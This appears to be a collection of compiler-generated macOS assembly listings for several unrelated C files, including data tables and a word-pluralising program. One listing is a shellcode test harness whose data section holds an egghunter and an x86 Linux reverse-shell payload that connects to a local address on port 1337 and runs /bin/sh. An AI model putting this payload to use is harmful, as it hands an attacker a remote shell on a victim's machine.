## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 2685407586 ## 0xa0101162 .long 2685403508 ## 0xa0100174 .long 2685407490 ## 0xa0101102 .long 2685403524 ## 0xa0100184 .long 2685407492 ## 0xa0101104 .long 2685403540 ## 0xa0100194 .long 2685407494 ## 0xa0101106 .long 2685403556 ## 0xa01001a4 .long 2685403554 ## 0xa01001a2 .long 2685403554 ## 0xa01001a2 .long 2685407618 ## 0xa0101182 .long 2685403458 ## 0xa0100142 .long 2685407522 ## 0xa0101122 .long 2685403474 ## 0xa0100152 .long 2148536612 ## 0x80101124 .long 2148536614 ## 0x80101126 .long 2148536644 ## 0x80101144 .long 2148536646 ## 0x80101146 .long 2148532598 ## 0x80100176 .long 2148532614 ## 0x80100186 .long 2148532630 ## 0x80100196 .long 2148532646 ## 0x801001a6 .long 2148532662 ## 0x801001b6 .long 2148532660 ## 0x801001b4 .long 2150630244 ## 0x80300364 .long 2148577536 ## 0x8010b100 .long 2148553056 ## 0x80105160 .long 2148532482 ## 0x80100102 .long 2816 ## 0xb00 .long 2816 ## 0xb00 .long 2976 ## 0xba0 .long 2976 ## 0xba0 .long 3 ## 0x3 .long 2 ## 0x2 .long 2 ## 0x2 .long 1 ## 0x1 .long 1 ## 0x1 .long 1 ## 0x1 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 5 ## 0x5 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 2490393 ## 0x260019 .long 4128818 ## 0x3f0032 .long 5767243 ## 0x58004b .long 7405668 ## 0x710064 .long 9044093 ## 0x8a007d .long 10682518 ## 0xa30096 .long 12320943 ## 0xbc00af .long 13959368 ## 0xd500c8 .long 15597793 ## 0xee00e1 .long 17236218 ## 0x10700fa .long 17236231 ## 0x1070107 .long 17236231 ## 0x1070107 .long 17236231 ## 0x1070107 .long 17236231 ## 0x1070107 .long 17236231 ## 0x1070107 .long 263 ## 0x107 .long 16842752 ## 0x1010000 .long 50528770 ## 0x3030202 .long 84149252 ## 0x5040404 .long 101057797 ## 0x6060505 .long 117901062 ## 0x7070706 .long 134744071 ## 0x8080807 .long 151587080 ## 0x9090908 .long 657929 ## 0xa0a09 .long 33619968 ## 0x2010000 .long 67371779 ## 0x4040303 .long 101057797 ## 0x6060505 .long 134743815 ## 0x8080707 .long 168429833 ## 0xa0a0909 .long 185273099 ## 0xb0b0b0b .long 202116108 ## 0xc0c0c0c .long 855309 ## 0xd0d0d .long 4194304 ## 0x400000 .long 44761120 ## 0x2ab0020 .long 13434896 ## 0xcd0010 .long 38338901 ## 0x2490155 .long 29818888 ## 0x1c70008 .long 6095053 ## 0x5d00cd .long 20644181 ## 0x13b0155 .long 17891913 ## 0x1110249 .long 15794180 ## 0xf10004 .long 28246471 ## 0x1af01c7 .long 12779725 ## 0xc300cd .long 5832797 ## 0x59005d .long 2687317 ## 0x290155 .long 39780667 ## 0x25f013b .long 37028425 ## 0x2350249 .long 2162961 ## 0x210111 .long 2031618 ## 0x1f0002 .long 7667953 ## 0x7500f1 .long 7274951 ## 0x6f01c7 .long 6881711 ## 0x6901af .long 1638605 ## 0x1900cd .long 24969411 ## 0x17d00c3 .long 5963869 ## 0x5b005d .long 45678681 ## 0x2b90059 .long 10944853 ## 0xa70155 .long 42139689 ## 0x2830029 .long 20250939 ## 0x135013b .long 9765471 ## 0x95025f .long 37683785 ## 0x23f0249 .long 9110069 ## 0x8b0235 .long 35193105 ## 0x2190111 .long 4259873 ## 0x410021 .long 1 ## 0x1 .long 184944128 ## 0xb060600 .long 202050054 ## 0xc0b0a06 .long 168496134 ## 0xa0b0c06 .long 202181644 ## 0xc0d0c0c .long 218958854 ## 0xd0d0c06 .long 185273356 ## 0xb0b0c0c .long 235735565 ## 0xe0d0a0d .long 168627726 ## 0xa0d0e0e .long 202181126 ## 0xc0d0a06 .long 202247182 ## 0xc0e0c0e .long 235735565 ## 0xe0d0a0d .long 252447756 ## 0xf0c0c0c .long 252382478 ## 0xf0b0d0e .long 219090446 ## 0xd0f0e0e .long 219090703 ## 0xd0f0f0f .long 202051342 ## 0xc0b0f0e .long 6 ## 0x6 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 0 ## 0x0 .long 305445548 ## 0x1234baac .space 12028 .subsections_via_symbols
the_stack_data/26699610.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov x9, sp mov x8, #38 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x0, #300 bl _malloc stur x0, [x29, #-8] ldur x0, [x29, #-8] adrp x1, _egg@PAGE add x1, x1, _egg@PAGEOFF str x1, [sp, #8] ; 8-byte Folded Spill mov x2, #4 str x2, [sp, #16] ; 8-byte Folded Spill mov x3, #-1 str x3, [sp, #24] ; 8-byte Folded Spill bl ___memcpy_chk ldr x1, [sp, #8] ; 8-byte Folded Reload ldr x2, [sp, #16] ; 8-byte Folded Reload ldr x3, [sp, #24] ; 8-byte Folded Reload ldur x8, [x29, #-8] add x0, x8, #4 bl ___memcpy_chk ldr x3, [sp, #24] ; 8-byte Folded Reload ldur x8, [x29, #-8] add x0, x8, #8 adrp x1, _shellcode@PAGE add x1, x1, _shellcode@PAGEOFF mov x2, #76 bl ___memcpy_chk ldur x8, [x29, #-8] mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf adrp x8, _egghunter@PAGE add x8, x8, _egghunter@PAGEOFF stur x8, [x29, #-16] ldur x8, [x29, #-16] blr x8 ldur x0, [x29, #-8] bl _free mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __DATA,__data .globl _egg ; @egg _egg: .asciz "\336\255\276\357" .globl _egghunter ; @egghunter _egghunter: .asciz "\3741\3221\311f\201\312\377\017B\215Z\004j!X\315\200<\362t\356\270\336\255\276\357\211\327\257u\351\257u\346\377\347" .globl _shellcode ; @shellcode _shellcode: .asciz "jfXj\001[1\322RSj\002\211\341\315\200\222\260fh\177\001\001\001fh\0059CfS\211\341j\020QR\211\341C\315\200j\002Y\207\332\260?\315\200Iy\371\260\013A\211\312Rh//shh/bin\211\343\315\200" .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Egghunter Length: %d\n" l_.str.1: ; @.str.1 .asciz "Memory location of shellcode: %p\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp leaq L_.str(%rip), %rdi movl $38, %esi movb $0, %al callq _printf movl $300, %edi ## imm = 0x12C callq _malloc movq %rax, -8(%rbp) movq -8(%rbp), %rdi leaq _egg(%rip), %rsi movl $4, %edx movq $-1, %rcx callq ___memcpy_chk movq -8(%rbp), %rdi addq $4, %rdi leaq _egg(%rip), %rsi movl $4, %edx movq $-1, %rcx callq ___memcpy_chk movq -8(%rbp), %rdi addq $8, %rdi leaq _shellcode(%rip), %rsi movl $76, %edx movq $-1, %rcx callq ___memcpy_chk movq -8(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf leaq _egghunter(%rip), %rax movq %rax, -16(%rbp) movb $0, %al callq *-16(%rbp) movq -8(%rbp), %rdi callq _free xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __DATA,__data .globl _egg ## @egg _egg: .asciz "\336\255\276\357" .globl _egghunter ## @egghunter .p2align 4 _egghunter: .asciz "\3741\3221\311f\201\312\377\017B\215Z\004j!X\315\200<\362t\356\270\336\255\276\357\211\327\257u\351\257u\346\377\347" .globl _shellcode ## @shellcode .p2align 4 _shellcode: .asciz "jfXj\001[1\322RSj\002\211\341\315\200\222\260fh\177\001\001\001fh\0059CfS\211\341j\020QR\211\341C\315\200j\002Y\207\332\260?\315\200Iy\371\260\013A\211\312Rh//shh/bin\211\343\315\200" .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Egghunter Length: %d\n" L_.str.1: ## @.str.1 .asciz "Memory location of shellcode: %p\n" .subsections_via_symbols
the_stack_data/165767913.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .subsections_via_symbols
the_stack_data/69826.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 sub sp, sp, #2880 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #68] mov x9, sp add x8, sp, #64 str x8, [x9] add x8, sp, #60 str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf bl _getchar str wzr, [sp, #56] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #56] ldr w9, [sp, #64] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x10, x8, x9 add x8, sp, #2472 add x10, x8, x10 ldrsw x8, [sp, #56] mul x9, x8, x9 add x8, sp, #2072 add x8, x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf bl _getchar b LBB0_3 LBB0_3: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #56] add w8, w8, #1 str w8, [sp, #56] b LBB0_1 LBB0_4: str wzr, [sp, #56] b LBB0_5 LBB0_5: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #56] ldr w9, [sp, #60] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _scanf bl _getchar b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=1 ldr w8, [sp, #56] add w8, w8, #1 str w8, [sp, #56] b LBB0_5 LBB0_8: str wzr, [sp, #56] b LBB0_9 LBB0_9: ; =>This Loop Header: Depth=1 ; Child Loop BB0_11 Depth 2 ldr w8, [sp, #56] ldr w9, [sp, #60] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_39 b LBB0_10 LBB0_10: ; in Loop: Header=BB0_9 Depth=1 str wzr, [sp, #48] str wzr, [sp, #52] b LBB0_11 LBB0_11: ; Parent Loop BB0_9 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #52] ldr w9, [sp, #64] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_16 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_11 Depth=2 ldrsw x8, [sp, #52] mov x9, #20 mul x10, x8, x9 add x8, sp, #2472 add x0, x8, x10 ldrsw x8, [sp, #56] mul x9, x8, x9 add x8, sp, #72 add x1, x8, x9 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_14 b LBB0_13 LBB0_13: ; in Loop: Header=BB0_9 Depth=1 mov w8, #1 str w8, [sp, #48] b LBB0_16 LBB0_14: ; in Loop: Header=BB0_11 Depth=2 b LBB0_15 LBB0_15: ; in Loop: Header=BB0_11 Depth=2 ldr w8, [sp, #52] add w8, w8, #1 str w8, [sp, #52] b LBB0_11 LBB0_16: ; in Loop: Header=BB0_9 Depth=1 ldr w8, [sp, #48] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_18 b LBB0_17 LBB0_17: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #52] mov x9, #20 mul x9, x8, x9 add x8, sp, #2072 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_38 LBB0_18: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 str x9, [sp, #24] ; 8-byte Folded Spill mul x9, x8, x9 add x8, sp, #72 str x8, [sp, #32] ; 8-byte Folded Spill add x0, x8, x9 bl _strlen ldr x10, [sp, #24] ; 8-byte Folded Reload ldr x8, [sp, #32] ; 8-byte Folded Reload mov x9, x0 str w9, [sp, #44] ldrsw x9, [sp, #56] mul x9, x9, x10 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #1 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #121 cset w8, ne tbnz w8, #0, LBB0_25 b LBB0_19 LBB0_19: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #2 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #97 cset w8, eq tbnz w8, #0, LBB0_25 b LBB0_20 LBB0_20: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #2 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #101 cset w8, eq tbnz w8, #0, LBB0_25 b LBB0_21 LBB0_21: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #2 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #105 cset w8, eq tbnz w8, #0, LBB0_25 b LBB0_22 LBB0_22: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #2 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #111 cset w8, eq tbnz w8, #0, LBB0_25 b LBB0_23 LBB0_23: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #2 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #117 cset w8, eq tbnz w8, #0, LBB0_25 b LBB0_24 LBB0_24: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x10, #20 mul x11, x8, x10 add x8, sp, #72 mov x9, x8 add x9, x9, x11 ldr w11, [sp, #44] subs w11, w11, #1 add x9, x9, w11, sxtw strb wzr, [x9] ldrsw x9, [sp, #56] mul x9, x9, x10 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf b LBB0_37 LBB0_25: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #1 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #111 cset w8, eq tbnz w8, #0, LBB0_28 b LBB0_26 LBB0_26: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #1 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #115 cset w8, eq tbnz w8, #0, LBB0_28 b LBB0_27 LBB0_27: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #1 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #120 cset w8, ne tbnz w8, #0, LBB0_29 b LBB0_28 LBB0_28: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf b LBB0_36 LBB0_29: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #2 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #99 cset w8, ne tbnz w8, #0, LBB0_31 b LBB0_30 LBB0_30: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #1 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #104 cset w8, eq tbnz w8, #0, LBB0_33 b LBB0_31 LBB0_31: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #2 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #115 cset w8, ne tbnz w8, #0, LBB0_34 b LBB0_32 LBB0_32: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 ldr w9, [sp, #44] subs w9, w9, #1 ldrsb w8, [x8, w9, sxtw] subs w8, w8, #104 cset w8, ne tbnz w8, #0, LBB0_34 b LBB0_33 LBB0_33: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf b LBB0_35 LBB0_34: ; in Loop: Header=BB0_9 Depth=1 ldrsw x8, [sp, #56] mov x9, #20 mul x9, x8, x9 add x8, sp, #72 add x8, x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf b LBB0_35 LBB0_35: ; in Loop: Header=BB0_9 Depth=1 b LBB0_36 LBB0_36: ; in Loop: Header=BB0_9 Depth=1 b LBB0_37 LBB0_37: ; in Loop: Header=BB0_9 Depth=1 b LBB0_38 LBB0_38: ; in Loop: Header=BB0_9 Depth=1 ldr w8, [sp, #56] add w8, w8, #1 str w8, [sp, #56] b LBB0_9 LBB0_39: ldr w8, [sp, #68] str w8, [sp, #20] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_41 b LBB0_40 LBB0_40: bl ___stack_chk_fail LBB0_41: ldr w0, [sp, #20] ; 4-byte Folded Reload add sp, sp, #2880 ldp x29, x30, [sp, #16] ; 16-byte Folded Reload ldp x28, x27, [sp], #32 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d %d" l_.str.1: ; @.str.1 .asciz "%s %s" l_.str.2: ; @.str.2 .asciz "%s" l_.str.3: ; @.str.3 .asciz "%s\n" l_.str.4: ; @.str.4 .asciz "%sies\n" l_.str.5: ; @.str.5 .asciz "%ses\n" l_.str.6: ; @.str.6 .asciz "%ss\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $2848, %rsp ## imm = 0xB20 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -2820(%rbp) leaq L_.str(%rip), %rdi leaq -2824(%rbp), %rsi leaq -2828(%rbp), %rdx movb $0, %al callq _scanf callq _getchar movl $0, -2832(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -2832(%rbp), %eax cmpl -2824(%rbp), %eax jge LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movslq -2832(%rbp), %rax leaq -416(%rbp), %rsi imulq $20, %rax, %rax addq %rax, %rsi movslq -2832(%rbp), %rax leaq -816(%rbp), %rdx imulq $20, %rax, %rax addq %rax, %rdx leaq L_.str.1(%rip), %rdi movb $0, %al callq _scanf callq _getchar ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -2832(%rbp), %eax addl $1, %eax movl %eax, -2832(%rbp) jmp LBB0_1 LBB0_4: movl $0, -2832(%rbp) LBB0_5: ## =>This Inner Loop Header: Depth=1 movl -2832(%rbp), %eax cmpl -2828(%rbp), %eax jge LBB0_8 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 movslq -2832(%rbp), %rax leaq -2816(%rbp), %rsi imulq $20, %rax, %rax addq %rax, %rsi leaq L_.str.2(%rip), %rdi movb $0, %al callq _scanf callq _getchar ## %bb.7: ## in Loop: Header=BB0_5 Depth=1 movl -2832(%rbp), %eax addl $1, %eax movl %eax, -2832(%rbp) jmp LBB0_5 LBB0_8: movl $0, -2832(%rbp) LBB0_9: ## =>This Loop Header: Depth=1 ## Child Loop BB0_11 Depth 2 movl -2832(%rbp), %eax cmpl -2828(%rbp), %eax jge LBB0_39 ## %bb.10: ## in Loop: Header=BB0_9 Depth=1 movl $0, -2840(%rbp) movl $0, -2836(%rbp) LBB0_11: ## Parent Loop BB0_9 Depth=1 ## => This Inner Loop Header: Depth=2 movl -2836(%rbp), %eax cmpl -2824(%rbp), %eax jge LBB0_16 ## %bb.12: ## in Loop: Header=BB0_11 Depth=2 movslq -2836(%rbp), %rax leaq -416(%rbp), %rdi imulq $20, %rax, %rax addq %rax, %rdi movslq -2832(%rbp), %rax leaq -2816(%rbp), %rsi imulq $20, %rax, %rax addq %rax, %rsi callq _strcmp cmpl $0, %eax jne LBB0_14 ## %bb.13: ## in Loop: Header=BB0_9 Depth=1 movl $1, -2840(%rbp) jmp LBB0_16 LBB0_14: ## in Loop: Header=BB0_11 Depth=2 jmp LBB0_15 LBB0_15: ## in Loop: Header=BB0_11 Depth=2 movl -2836(%rbp), %eax addl $1, %eax movl %eax, -2836(%rbp) jmp LBB0_11 LBB0_16: ## in Loop: Header=BB0_9 Depth=1 cmpl $1, -2840(%rbp) jne LBB0_18 ## %bb.17: ## in Loop: Header=BB0_9 Depth=1 movslq -2836(%rbp), %rax leaq -816(%rbp), %rsi imulq $20, %rax, %rax addq %rax, %rsi leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf jmp LBB0_38 LBB0_18: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rax leaq -2816(%rbp), %rdi imulq $20, %rax, %rax addq %rax, %rdi callq _strlen ## kill: def $eax killed $eax killed $rax movl %eax, -2844(%rbp) movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $121, %eax jne LBB0_25 ## %bb.19: ## in Loop: Header=BB0_9 Depth=1 movslq -2832(%rbp), %rcx leaq -2816(%rbp), %rax imulq $20, %rcx, %rcx addq %rcx, %rax movl -2844(%rbp), %ecx subl $2, %ecx movslq %ecx, %rcx movsbl (%rax,%rcx), %eax cmpl $97, %eax je LBB0_25 ## %bb.20: ## in Loop: Header=BB0_9 Depth=1 